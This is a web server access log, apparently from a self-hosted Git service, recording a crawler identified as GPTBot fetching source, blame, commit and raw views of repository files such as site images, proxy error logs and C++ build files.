"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:15:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 146781] [Gzip 20.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:15:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:15:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:15:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:15:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 10324] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:15:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:15:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 14988] [Gzip 7.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" +[17/Feb/2026:15:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2fhoneywell-logo.svg" [Client 74.7.227.38] [Length 23341] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:15:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2fbearing.png" [Client 74.7.227.38] [Length 19836] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:15:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14372] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:15:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 69273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:15:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2ffavicon.ico" [Client 74.7.227.38] [Length 19807] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:15:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2f.NETCoreApp%2cVersion%3dv8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 21414] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:15:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2freactor.png" [Client 74.7.227.38] [Length 19819] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:15:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 12819] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:15:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 26614] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:15:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 16178] [Gzip 7.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:15:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 15256] [Gzip 6.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:15:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 7414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:15:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 19569] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:15:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14444] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:15:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:15:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 20991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:15:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 38249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:15:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 14744] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:15:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 12751] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:15:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 10141] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:15:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 17869] [Gzip 10.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:15:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 10141] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:15:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 9453] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:15:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14402] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:15:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 48135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:15:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 12321] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:15:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fstatus.json" [Client 74.7.227.38] [Length 22631] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" +[17/Feb/2026:15:53:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2ftsconfig.json" [Client 74.7.227.38] [Length 23728] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" +[17/Feb/2026:15:53:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fpackage.json" [Client 74.7.227.38] [Length 23518] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" +[17/Feb/2026:15:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fmetadata.json" [Client 74.7.227.38] [Length 22984] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" +[17/Feb/2026:15:53:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10688] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:53:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13179] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10564] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:53:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14472] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:15:53:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 9945] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:15:53:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 20991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:15:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:53:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10564] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 11738] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:53:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10567] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:53:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] 